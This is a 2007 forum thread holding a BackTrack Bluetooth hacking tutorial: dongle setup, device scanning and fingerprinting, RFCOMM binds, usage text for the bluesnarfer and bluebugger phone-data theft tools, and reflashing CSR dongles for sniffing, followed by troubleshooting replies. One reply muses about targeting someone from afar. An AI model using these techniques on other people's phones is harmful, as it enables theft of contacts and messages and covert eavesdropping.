PDA

View Full Version : [New Tutorial For BT3 ONLY]One bluetooth post to rule them all!



drgr33n
12-13-2007, 01:20 AM
Backtrack Ultimate Bluetooth Tutorial

Hey all

After I received lots of mail and requests I decided to shed some more light on bluetooth. In this tutorial I am going to be covering the following subjects...

1) Setting up your bluetooth equipment
2) Scanning and fingerprinting devices
3) Connectivity and RFCOMM
4) Bluebugging & Bluesnarfing

And as a merry Christmas to all at remote exploits :D

5) Making bluetooth sniffing hardware for $39.99

Video tutorials on different subjects will be added to this post over the next week.

OK lets begin the first subject might sound silly to most here but for the guys that just don't know I'm going to cover it anyway. To setup your bluetooth USB device simply plug it in and wait for 10 sec's. Then type in console



hciconfig hci0 up


And you should have your adapter up and working, you can test with the following command .....



hciconfig -a


And you should see something like the following .



hci0: Type: USB
BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ISSCBTA'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
Manufacturer: Integrated System Solution Corp. (57)


Ok if you are stuck at this point I would suggest you go out and buy a compatible USB dongle for backtrack :D But if you are still with me lets move on.

Next is fingerprinting a bluetooth device. Fingerprinting is a term we use for profiling a device, and to do this backtrack has a collection of tools called bluez. Bluez is like the standard bluetooth package for linux. For fingerprinting we can use a couple of those tools. One is hcitool, we can use hcitool to scan for devices that are broadcasting. We scan with hcitool with the following command.



hcitool scan hci0


And you should see something like ...



Scanning ...
00:11:22:33:44:55 hackme


You can also brute force scan for devices, backtrack also has you covered on this with a wonderful tool called btscanner. Btscanner can also inquiry scan :D You would use btscanner in a inquiry scan if you were wardriving.

The other is Sdptool, sdptool will browse our device for open channels and tell us what services are available on what channels.

We fingerprint devices with sdptool by issuing the following command



sdptool browse victim_Mac


And you should see something like this .........



Service Name: Serial Port
Service RecHandle: 0x10001
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2
Profile Descriptor List:
"Serial Port" (0x1101)
Version: 0x0100

Service Name: Dial-up Networking
Service RecHandle: 0x10002
Service Class ID List:
"Dialup Networking" (0x1103)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10007
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: Object Push
Service RecHandle: 0x10008
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100


Lets take a look at what we have, on two we have a serial port/channel on three we have dial up on 6 we have OBEX ftp and on 7 we have OPUSH.

All are interesting :D And no we have a pretty good idea about what the device is and so on.

Now on to the bit most people I speak to struggle with :D the dreaded RFCOMM :O. RFCOMM is a simple set of transport protocols, made on top of the L2CAP protocol, providing emulated RS-232 serial port. or in lamens terms they provide the language your device and laptop need to talk to each other.

Now the first thing to do is to setup our bluetooth configuration so lets go over to the /etc dir and get stuck in.

open /etc/bluetooth/hcid.conf and replace the lot with this



#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}


You can setup your own passkey and name, also go over to a shell and type



hciconfig -a


And copy the class to hcid.conf, save and exit. You could setup rfcomm here to but its a live cd.

Now restart your bluetooth device like so



bash /etc/rc.d/rc.bluetooth restart


And now we can setup our rfcomm binds, I will post a bash script when I have time :D but for now you will have to do it the manual way .

First thing is to setup our devices .....



mknod -m 666 /dev/rfcomm0 c 216 3
mknod -m 666 /dev/rfcomm1 c 216 6
mknod -m 666 /dev/rfcomm2 c 216 7


Ok what we did there is create three binds to our bluetooth device. First one is RFCOMM0 and is on channel 3 DUN Dial up, Second is RFCOMM1 and is on channel 6 FTP and the third is RFCOMM2 and is on channel 7 OBEX push.

Now lets connect it all up with sdptool.



sdptool add --channel=3 DUN
sdptool add --channel=6 FTP
sdptool add --channel=7 OPUSH


Now we have setup our bluetooth dongle correctly we can begin hacking :D

If I were to talk you though every possible exploit there is for bluetooth it would take all next year and I still wouldn't be finished so the two hack are going to be bluesnarfer and bluebugger.

Bluesnarfer connects to a target Bluetooth device via Bluetooth's OBEX Push profile. But instead of pushing a business card, it pulls, using a "get" request for files with known names, such as the phonebook file (telecom/pb.vcf) or the calendar file (telecom/cal.vcs), Bluebugger works in a similar way.
Also bear in mind that these security flaws can still be used against you. With a little bit of social engineering you could pre pair a phone to your laptop and exploit it from then onwards. Stand by for a video of bluesnarfer and bluebugger successfully completing a hack on my samsung d600.

Both are pretty strait forward to use now you have your bluetooth setup correctly. I'm not going to post commands because their is a video on the way. First bluebugger....



bluebugger 0.1 ( MaJoMu | www.codito.de )
-----------------------------------------

Usage: bluebugger [OPTIONS] -a <addr> [MODE]

-a <addr> = Bluetooth address of target

Options:
--------
-m <name> = Name to use when connecting (default: '')
-d <device> = Device to use (default: '/dev/rfcomm')
-c <channel> = Channelto use (default: 17)
-n = No device name lookup
-t <timeout> = Timeout in seconds for name lookup (default: 5)
-o <file> = Write output to <file>

Mode:
-----
info = Read Phone Info (default)
phonebook = Read Phonebook (default)
messages = Read SMS Messages (default)
dial <num> = Dial number
ATCMD = Custom Command (e.g. '+GMI')

Note: Modes can be combined, e.g. 'info phonebook +GMI'


And Bluesnarfer ......




bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD : valid AT+CMD (GSM EXTENSION)

TYPE : valid phonebook type ..
example : "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (recevied call list)
"XX" much more

-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel

-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search "name" in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info


Now for the finally how to turn an ordinary USB bluetooth dongle into a $1000 dollar sniffing tool :D

imported_spankdidly
12-13-2007, 01:25 AM
I have never gotten any of the bluetooth BS to work. Awesome tutorial though! :D

drgr33n
12-13-2007, 02:36 AM
Finally and to say merry xmas here it is, how to turn an ordinary USB dongle with a Cambridge Silicon Radio chipset into the FTS4BT sniffing dongle :D Before we begin I would like to say I do not hold any responsibility for anybody breaking their equipment. You are doing this at your own risk : but hey for $39 who cares :D

I have been reading upon this for a while now and I was reading one of max@remote-exploit papers where he had changed the firmware using the bluez utilities to make the dongle go into RAW mode or promiscuous mode.

EDIT

Seems I was a bit keen in this tutorial as it turns out this mod was not successful after all. The reason being that there are two types of bluecore-4 chipset, BlueCore-4 rom and BlueCore-4 external. The ROM chip has the firmware embedded on the chip and the EXT model has external memory for the firmware. You need to be able to update the firmware to allow sniffing in windows.

To find out if you have the right type of chipset, type ........




hciconfig hci* revision


And if you see EXT excellent but see ROM and you are no go. Saying that ROM chipsets will still go into RAW mode and the FTS4BT software reads the device as compatible but calibration crashed for me.

Also it must be in promiscuous mode because we see bytes via hciconfig and RAW on the modes ??? I'm looking into this more at the moment so as I learn more I will add.

First lets backup your old firmware with dfutool.



dfutool -d hci0 archive backold.dfu


Select the corresponding number to your card. Next lets fire up the card



hciconfig hci0 up


This may not make sense now but it will very soon so pay attention lol. There are multiple places to read bytes on the stick. Depending on what card you are using these can be different. In general these are “Default” (0◊0000), “param” (0◊0008), “psi” (0◊0001), “psf” (0◊0002) and “psrom” (0◊0004). If yours is different you cankeeptrying until you run out of numbers and then take the dongle back :D

Now we have have to hunt down the value of the USB product & vendor identifier.

To get the product ID type



bccmd psget -s 0x0000 0x02bf


And you shroud see


USB product identifier: 0x0001 (1)


And now the vendor ID



bccmd psget -s 0x0000 0x02be


From what I have read most of the time the stuff you need to edit is on psf 0◊0002 but yours may be different. But theres only five it can be :D Now lets write the new ID



bccmd psset -s 0◊0000 0◊02bf 0◊0002


Now check the changes were made



bccmd psget -s 0x0000 0x02bf


And you should see now



USB product identifier: 0x0002 (2)


Sucsess !!!!!!

Now from what I have read 9 times out of ten you don't need to change your vendor ID but check to see if its 0◊0a12 if not change that to.



bccmd psset -s 0◊0000 0◊02be 0◊0a12


And you are done, there is support for *nux but I have yet to find it but you can see it sniffing if you keep retyping hciconfig hci0 you will see the tx and rx byte rising and you are in RAW mode :D



drgr33n ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:11:67:5A:A5:C8 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:41281 acl:0 sco:0 events:0 errors:0
TX bytes:42532 acl:0 sco:0 commands:1971 errors:0

drgr33n ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:11:67:5A:A5:C8 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:41293 acl:0 sco:0 events:0 errors:0
TX bytes:42535 acl:0 sco:0 commands:1972 errors:0

drgr33n ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:11:67:5A:A5:C8 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:41305 acl:0 sco:0 events:0 errors:0
TX bytes:42538 acl:0 sco:0 commands:1973 errors:0

drgr33n ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:11:67:5A:A5:C8 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:41317 acl:0 sco:0 events:0 errors:0
TX bytes:42541 acl:0 sco:0 commands:1974 errors:0

drgr33n ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:11:67:5A:A5:C8 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:41329 acl:0 sco:0 events:0 errors:0
TX bytes:42544 acl:0 sco:0 commands:1975 errors:0


Now more and more stuff is coming out every month on this stuff so now it may seen pointless but give it 6 months and you will be laughing :D

Merry Christmas !

imported_spankdidly
12-13-2007, 02:45 AM
http://www.5min.com/Video/Eavesdropping-on-Bluetooth-Headsets-925061

Funny Stuff.

I was able to get most of this working, however, my headset was not vulnerable or something.

Re@lity
12-13-2007, 03:17 AM
Very nice write up :)

As you stated, this isn't an area that really gets much coverage, primarily because it has always been artificially *held* within the mega-bucks arena.
But I suppose I can understand why, too ;)

drgr33n
12-13-2007, 03:18 AM
Yea car whisperer is funny and a nice add too Cheers spankdidly :D

@ Re@lity yep thats why we have to bring their $1000 dollar bill down to $39 ;D

ESC201
12-13-2007, 03:52 AM
Just as some side info, if you are using a logitech bluetooth adapter that came with your keybaord/mouse you may get an issue with the hciconfig hci0 up command. To remedy this, enter the commands...
hid2hci
hciconfig hci0 up
and last to make sure its up, hciconfig -a

This probably doesn't apply to many people but oh well.
(I had that problem though. Thanks google. :) )

Andy90
12-13-2007, 11:49 AM
Dr_Green I love you !!!

Will have a go at this lot the other side of the weekend :)

Much appreciated.

imported_tsunami
12-13-2007, 03:05 PM
Great Dr_Greeeeeeeennnnnnn!

drgr33n
12-13-2007, 05:23 PM
Thanks guys glad you liked it, sorry about the bad english and spelling, It was late last nite and I was running on about 10 % brainpower :D Just been through and sorted the odd really bad bits out.

imported_spankdidly
12-13-2007, 06:10 PM
Thanks guys glad you liked it, sorry about the bad english and spelling, It was late last nite and I was running on about 10 % brainpower :D Just been through and sorted the odd really bad bits out.

You do more with your 10% brain power than I do with 85%. Good Tut.

dapirates1
12-13-2007, 06:47 PM
open /etc/bluetooth/hcid.conf and replace the lot with this


I dont have this directory using bt2 final. Do i just create it?
Thank you for the tutorial

imported_spankdidly
12-13-2007, 06:49 PM
Yeah, that will work.

HighPointSecurity
12-14-2007, 05:20 AM
When I type:
mknod -m 666 /dev/rfcomm/0 c 216 3

I get:

mknod: 'dev/rfcomm/0': no such file or directory

====================================

also same result when I type:

bash /etc/rc.d/rc.bluetooth restart

===================================

Are you using the same version of BT2 as the ISO download ???

drgr33n
12-14-2007, 11:41 AM
Sorry guys should of put it in the title this tutorial is for backtrack 3.

Now uploading the little bluesnarfing / bluebugging demo video.

-=Xploitz=-
12-14-2007, 06:14 PM
Sorry guys should of put it in the title this tutorial is for backtrack 3.



Ill take care of that for ya. ;)

sunnyd24
12-15-2007, 02:22 AM
I got the following similar to highpointsecurity, although restart works the mknod stuff doesn't.

I'm using BT3 beta, am I missing something!


bt ~ # bash /etc/rc.d/rc.bluetooth restart
Stopping Bluetooth subsystem: pand dund rfcomm hidd sdpd hcid.
Starting Bluetooth subsystem: hcid passkeys.

bt ~ # mknod -m 666 /dev/rfcomm/0 c 216 3
mknod: `/dev/rfcomm/0': No such file or directory

bt ~ # mknod -m 666 /dev/rfcomm/1 c 216 6
mknod: `/dev/rfcomm/1': No such file or directory

Regards,
Sun

sunnyd24
12-15-2007, 02:35 AM
Ok figured out the problem highpointsecurity, :)

I used the following:
bt ~ # mknod -m 666 /dev/rfcomm0 c 216 3
bt ~ # mknod -m 666 /dev/rfcomm1 c 216 6

notice the / in rfcomm/0 has been removed!

Maybe Dr Green can OK this, and if its right then correct the tutorial? (Mus be a Typo) :confused:

Regards,
Sun

ju1ce
12-15-2007, 03:20 AM
I figured I would make my first post a useful one.. Long time lurker but trying to contribute more now that I have time..

the CSR tutorial was excellent and I had been wanting to do this since i first read about the capabilities a bit ago..

anyways.. the useful part..

If you can't locate the usb dongle recommended above.. I've located pretty much the ultimate option for creating a sniffing bluetooth device WITH RP-SMA connector ALREADY BUILT IN!

I ordered one a while back and just broke it out a few weeks ago to play with and i'm quite impressed.. decent construction, good range out of the box, compatible with bt2final out of the box.. and to boot.. it's a CSR chipset and has the RP-SMA connector onboard like I mentioned..

can't seem to post a url since i'm so new.. so if someone can pm me I can drop the link and you can add it to the thread.. or just goto the a7eng website and look for the eb502-hci bluetooth usb adapter..


I had been looking for a bluetooth dongle that did not need to be modified for some time and stumbled on this one.. I definately recommend you pick one up as they're litterally awesome..

enjoy..

DeL3e7
12-16-2007, 03:08 PM
what kind of hacking can be done without pairing?

JF1980
12-16-2007, 03:24 PM
what kind of hacking can be done without pairing?

From what I can see not much at all unless the phone is 10+ years old!

drgr33n
12-17-2007, 03:37 AM
Thanks -=xploits=- :D

And yes sunnyd24 sorry a typo error :o I'm sorry and I'l correct it now.

sunnyd24
12-17-2007, 03:41 PM
No problem, Glad I could be of help!
Dr Green, the tutorials must be quite difficult to produce. Thanks anyway!

drgr33n
12-17-2007, 04:34 PM
Sorry ju1ce didn't see you there :D heres the link to the card ju1ce added.

http://www.a7eng.com/products/embeddedblue/hci/eb502-HCI.htm

sunnyd24 na these tutorials are easy :D I am planning on a advanced bluetooth hacking guide explaining abit more on the workings of bluetooth in general, how the old hacks work, bluetooth sniffing in practice yadayada :D

And reading more it looks like bluez is now in the process of adding a csr sniffer :D google csrsniffer.c

EDIT

Going to be adding some more info on the CSR dongle modification in the next couple of hours. If you are intrested in doing this hack, I would suggest going back and reading the moddifications to the post :D

imported_sardinemaster
12-18-2007, 03:07 AM
hi!
Can I just say this looks very interesting, BUT one thing in this thread is missing... What is the actual point of this? What can you do by putting all these commands in?Bluesnarfing? What is it? What does it do?
You guys probably want to beat me up for my stupidity, but I am quite curious to know what it is, as it looks fairly interesting.

Cheers.

imported_spudgunman
12-18-2007, 12:17 PM
I am cuerious as well as to what the RAW mode will do... I show the following and dont know why I want to hack it - my usb bluetooth also seems to look like a hacked version but its not in RAW mode


bt ~ # bccmd psget -s 0x0000 0x02be
USB vendor identifier: 0x0a12 (2578)
bt ~ # bccmd psget -s 0x0000 0x02bf
USB product identifier: 0x0002 (2)
bt ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:0C:41:E1:FF:81 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING
RX bytes:197 acl:0 sco:0 events:15 errors:0
TX bytes:124 acl:0 sco:0 commands:14 errors:0

bt ~ # hciconfig hci0 -a
hci0: Type: USB
BD Address: 00:0C:41:E1:FF:81 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING
RX bytes:197 acl:0 sco:0 events:15 errors:0
TX bytes:124 acl:0 sco:0 commands:14 errors:0
Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'fukme'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.1 (0x1) HCI Rev: 0x20d LMP Ver: 1.1 (0x1) LMP Subver: 0x20d
Manufacturer: Cambridge Silicon Radio (10)

bt ~ #

drgr33n
12-18-2007, 07:45 PM
@ sardinemaster What a stupid question !!! :D I'm not going to waste my time answering those sort of questions !

@ spudgunman It looks like you may have some problems. Can you post the output of



bccmd psget -s 0x0001 0x02bf

imported_spankdidly
12-18-2007, 08:10 PM
@ sardinemaster What a stupid question !!! :D I'm not going to waste my time answering those sort of questions !

[/code]

LOL, you just did!

You know how Par1s h1lton's phone got h4cked and all of her phone numbers got posted on the net? Well that was some sort of bluesnarf attack. You can do stuff like that. Why anyone would? I'm not sure. But if you were targeting someone then it would be something worth having in your arsenal. Then you can make one of these bad boys and do it from a few cities away.

http://www.boingboing.net/2005/03/13/howto-build-a-blueto.html

juststormy
12-18-2007, 08:23 PM
Hi,

thanks a lot for these huge introduction into bluetooth.
i'm suddenly at the point where to use bluesnarfer or bluebugger.
i cannot find your video where you wanna explain how theese works? I think i'm blind ;-)
Normally i'm only interested in WLAN and not bluetooth, this should only be a short excursion into bluetooth, so i hope you can show it to me :-)

Thank's a lot men!

drgr33n
12-18-2007, 08:23 PM
@ spankdidly yea good point :D and then sniper rifles are cool :D until you get piped of by a police sniper thinking you are a terrorist :D

Did you know that paris hilton was not the victim of any "hack". The guy used his social engineering skills to get the info he needed. Well thats what I was told:D Not sure who he rang or conned for pictures like that lol

Sorry I did upload it but it was terrible quality and never bothered to do it again hang on il upload it now

drgr33n
12-18-2007, 09:38 PM
http://www.mediafire.com/?5gb2f3xjwwb

imported_sardinemaster
12-18-2007, 10:08 PM
@ Dr. Green:
I'm sorry, but i think that was terribly rude from your behalf not to answer me, not everyone has to know what this is, and when you start a post like this, you should take in account those that never heard of it, and put some kind of link in here, or a quick explanation made by yourself explaining what this actually is.

Cheers.

imported_spankdidly
12-18-2007, 10:13 PM
@ Dr. Green:
I'm sorry, but i think that was terribly rude from your behalf not to answer me, not everyone has to know what this is, and when you start a post like this, you should take in account those that never heard of it, and put some kind of link in here, or a quick explanation made by yourself explaining what this actually is.

Cheers.

No, That's not true. if you dont know what it is, then google the damn thing. His tutorial had the assumption that you KNOW something about the program. if you dont know, then look it up and research it. Don't whine to him because he wont tell you the in's and out's of a program on a web forum. You are obviously on the internet, so USE it.

Ps. Why the hell are you watching a tutorial about a program you have never heard of?

EDIT: ALSO, in the time it took you to write that post you could have looked it up and read the MAN pages on it. There, I'm done ranting :D

-=Xploitz=-
12-18-2007, 10:20 PM
Ps. Why the hell are you watching a tutorial about a program you have never heard of?

I watched numerous WEP cracking videos when I was a no0b...and I had no idea what the hell aircrack was. :eek:

I'm sure he saw the video...liked it and wanted to know more about what was going on. Pure curiousness is why he and why we all ask questions.

Give the kid a break spanky. :rolleyes:

imported_spankdidly
12-18-2007, 10:24 PM
I watched numerous WEP cracking videos when I was a no0b...and I had no idea what the hell aircrack was. :eek:

I'm sure he saw the video...liked it and wanted to know more about what was going on. Pure curiousness is why he and why we all ask questions.

Give the kid a break spanky. :rolleyes:

Sorry there sploitz. It seems I am coming across more and more posts like this. I understand you gotta learn somewhere. But Sheesh, whip out your google.com tool once in awhile. Yes, you may have been a noob, but you researched the EFF out of stuff before you asked questions. The guy didn't even try. Curiosity is one thing, not being able to type blusnarfer or bluebugger into google is another.

-=Xploitz=-
12-18-2007, 10:33 PM
Sorry there sploitz. It seems I am coming across more and more posts like this. I understand you gotta learn somewhere. But Sheesh, whip out your google.com tool once in awhile. Yes, you may have been a noob, but you researched the EFF out of stuff before you asked questions. The guy didn't even try. Curiosity is one thing, not being able to type blusnarfer or bluebugger into google is another.

Perhaps. :)

I get TONS and TONS of post from no0bs posting VERY no0bish questions in my video threads all the time..and in PM's!! ESPECIALLY PM's!!! I have an open door policy..but their taking advantage of it sometimes!! :D

But seriously. If you don't respond to noobish questions...they'll eventually give up and google or do a forum search anyways.

Sometimes its best to just not answer rather that tell em to go EFF off. ;)

imported_spankdidly
12-18-2007, 10:35 PM
Sometimes its best to just not answer rather that tell em to go EFF off. ;)

Ah the wise words of "TeH Sploitz" never cease to amaze me. :D:D:D

drgr33n
12-18-2007, 10:39 PM
I'm sorry, but i think that was terribly rude from your behalf not to answer me, not everyone has to know what this is, and when you start a post like this, you should take in account those that never heard of it, and put some kind of link in here, or a quick explanation made by yourself explaining what this actually is.


If you don't know what it is, maybe you should try this link.

http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-gb%3AIE-SearchBox&rlz=1I7ADBR&q=what+is+bluebugging

Guys :D chill out !!! That guy said what do I do with those commands :eek: If he didn't know what bluebugger does and what it is google is the way forward.

I will be happy to answer all questions regarding my post just not the ones asking what is the meaning of the post :D

imported_spankdidly
12-19-2007, 12:34 AM
If you don't know what it is, maybe you should try this link.

http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-gb%3AIE-SearchBox&rlz=1I7ADBR&q=what+is+bluebugging

Guys :D chill out !!! That guy said what do I do with those commands :eek: If he didn't know what bluebugger does and what it is google is the way forward.

I will be happy to answer all questions regarding my post just not the ones asking what is the meaning of the post :D

What's the meaning of this POST Dr Green!?!?

juststormy
12-19-2007, 12:37 AM
Soooo i've tested a lot but i think there is a conflict between me and my bluetooth adapter :-D


bt ~ # hciconfig -a revision
hci0: Type: USB
BD Address: 00:02:72:81:3B:98 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING PSCAN
RX bytes:899 acl:0 sco:0 events:44 errors:0
TX bytes:717 acl:0 sco:0 commands:43 errors:0
Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF PARK
Link mode: ACCEPT MASTER
Name: 'device1'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.1 (0x1) HCI Rev: 0x33c LMP Ver: 1.1 (0x1) LMP Subver: 0x33c
Manufacturer: Cambridge Silicon Radio (10)

This is the output of my adapter, so i decided to do like you described and turned to the following:


bt ~ # bccmd psget -s 0x0000 0x02bf
USB product identifier: 0x0001 (1)
bt ~ # bccmd psget -s 0x0000 0x02be
USB vendor identifier: 0x0a12 (2578)
bt ~ # bccmd psset -s 0x0002 0x02bf 0x0002
Can't execute command: No such device or address (6)

i've allready tryed -s 0x0001-5 but not working, the same error every time.

Any ideas to get this adapter work?

Thank's a lot Bluetooth Guys :-)

imported_sardinemaster
12-19-2007, 01:35 AM
Google is the way forward, you're right, I just would have expected you to have made it clear on the first post... but there you go, you migth want to add it to your first post to avoid newbie questions like mine.

h**p://en.wikipedia.org/wiki/Bluebugging

Cheers!

ju1ce
12-19-2007, 03:14 AM
green.. so I have 2 dongles that I can flash with the new firmware.. including the one i posted above.. any issues with using it as a regular bluetooth module for scanning/probing with the new firmware? or is it one or the other.. just wanted to confirm before I flashed it..

also.. the frontline app only seems to be supporting xp.. though bt3 seems to have a slimmed down version already built in..

have you played with an antenna at all with the bt devices? in practice I find that it's not as easy to get long range readings as the articles say.. the noise is so high that it needs to be fairly close up to actually see anything..

hooked it up to a 14dbi yagi and not a whole lot was noticed.

drgr33n
12-19-2007, 03:20 PM
Juststormy Have you tried 0x0000 ????

@ ju1ce I haven't even got my dongle yet !!! Although it was CSR it had the bluecore-4 ROM chipset so I couldn't get the new firmware on :( I'm waiting for my new dongle to arrive :D

To use as a normal dongle again I'm not 100 % sure but I don't think this will be possible until you reflash with your old firmware and change the product ID back??? But you know more than me at this point :D

juststormy
12-19-2007, 03:29 PM
Juststormy Have you tried 0x0000 ????


No i didn't but i'll try as far as i am on my BT machine - let you know if this brings success.

Thank's ;)

@Dr Green - can you post a example of your /etc/bluetooth.conf - this would be nice

imported_spudgunman
12-19-2007, 06:38 PM
@ spudgunman It looks like you may have some problems. Can you post the output of


bccmd psget -s 0x0001 0x02bf



bt ~ # bccmd psget -s 0x0001 0x02bf
Can't execute command: No such device or address (6)
bt ~ # bccmd pslist
0x0001 - Bluetooth address (8 bytes)
0x001e - Radio power table (36 bytes)
0x0021 - Default transmit power (2 bytes)
0x00dc - Unknown (28 bytes)
....
0x00ee - Unknown (2 bytes)
0x0191 - Unknown (20 bytes)
0x01f6 - Crystal frequency trim (2 bytes)
0x01f9 - Host interface (2 bytes)
0x0217 - Transmit offset (2 bytes)
0x0240 - TX pre-amplifier level (2 bytes)
0x0242 - RX single ended (2 bytes)
0x025c - Module security code (16 bytes)
0x02bf - USB product identifier (2 bytes)
bt ~ # bccmd psget -s 0x0000 0x0001
Bluetooth address: 0xe100 0x81ff 0x4100 0x0c00
bt ~ # bccmd psget -s 0x0000 0x0002
Country code: 0x0000 (0)
bt ~ # bccmd psget -s 0x0000 0x0003
Class of device: 0x00000000 (0)
bt ~ # bccmd psget -s 0x0000 0x0004
Device drift: 0x00fa (250)

imported_spudgunman
12-19-2007, 09:45 PM
will try that, is that in the same lines of this part of your guide?


This may not make sense now but it will very soon so pay attention lol. There are multiple places to read bytes on the stick. Depending on what card you are using these can be different. In general these are “Default” (0◊0000), “param” (0◊0008), “psi” (0◊0001), “psf” (0◊0002) and “psrom” (0◊0004). If yours is different you cankeeptrying until you run out of numbers and then take the dongle back

I got lost in the def and the memory space and that paragraph got me confused.


EDIT- some how I posted this before your answer, there seems to be a time issue on the server?

juststormy
12-19-2007, 09:50 PM
bt ~ # bccmd -d hci0 psset -s 0x0000 0x02bf 0x0002
Can't execute command: No such device or address (6)


Mh did not work @ Dr_Green.

Any other ideas to get into the sniff mode?
Thanks!

drgr33n
12-19-2007, 10:42 PM
try



bccmd psset -s 0x0000 0x02bf 0x0002

imported_spudgunman
12-20-2007, 04:02 PM
bt ~ # bccmd -d hci0 psset -s 0x0000 0x02bf 0x0002
Can't execute command: No such device or address (6)
Mh did not work @ Dr_Green.

Any other ideas to get into the sniff mode?
Thanks!

yea same here I tried 2,4,8 all with same results.

The_Denv
12-20-2007, 08:55 PM
Hello Dr_GrEen,

I followed your guide and only got to the DFU section lol.

Here are my results:


bt ~ # hciconfig -a revision
hci0: Type: USB
BD Address: 00:0E:E7:50:02:6F ACL MTU: 384:8 SCO MTU: 64:8
UP RUNNING
RX bytes:925 acl:0 sco:0 events:20 errors:0
TX bytes:65 acl:0 sco:0 commands:18 errors:0
Features: 0xff 0xff 0x8f 0xfe 0x9b 0xf9 0x00 0x80
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'CSR - bc4'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 2.0 (0x3) HCI Rev: 0x7a6 LMP Ver: 2.0 (0x3) LMP Subver: 0x7a6
Manufacturer: Cambridge Silicon Radio (10)

bt ~ # dfutool -d hci0 archive backold.dfu
Can't find any DFU devices


I tried exploring with the DFU comands, but no joy.

dfutool - Device Firmware Upgrade utility ver 3.12

Usage:
dfutool [options] <command>

Options:
-d, --device <device> USB device
-h, --help Display help

Commands:
verify <dfu-file> Check firmware file
modify <dfu-file> Change firmware attributes
upgrade <dfu-file> Download a new firmware
archive <dfu-file> Upload the current firmware


I don't understand why it states there are no DFU devices as I have a 4GB datastick in one slot and a bluetooth device in the other USB slot. I can use hcitool and hciconfig well, I wonder what it could be? Any advice? Maybe it could be that it states CSR-bc4 [bluechip4]. I dont want to spend 100$ on a bt100 dongle lol.

Cheers

imported_spankdidly
12-21-2007, 09:03 PM
Yo Dr Green. I decided to give all of this a shot. I got a sniffing 0x0000 device now. The Tx goes up each time I do

hciconfig -a

But what the heck do I do now? How do I get into my cell phone? I can scan it. but it always gives me some sort of error. What next MANG!

jujuqka
12-22-2007, 02:02 AM
just got one question.!
Has anybody gotten this thing to work other than Green?
if so how cause i think this is a lost cause.. its just ot problematic!!:mad:

drgr33n
12-22-2007, 04:20 AM
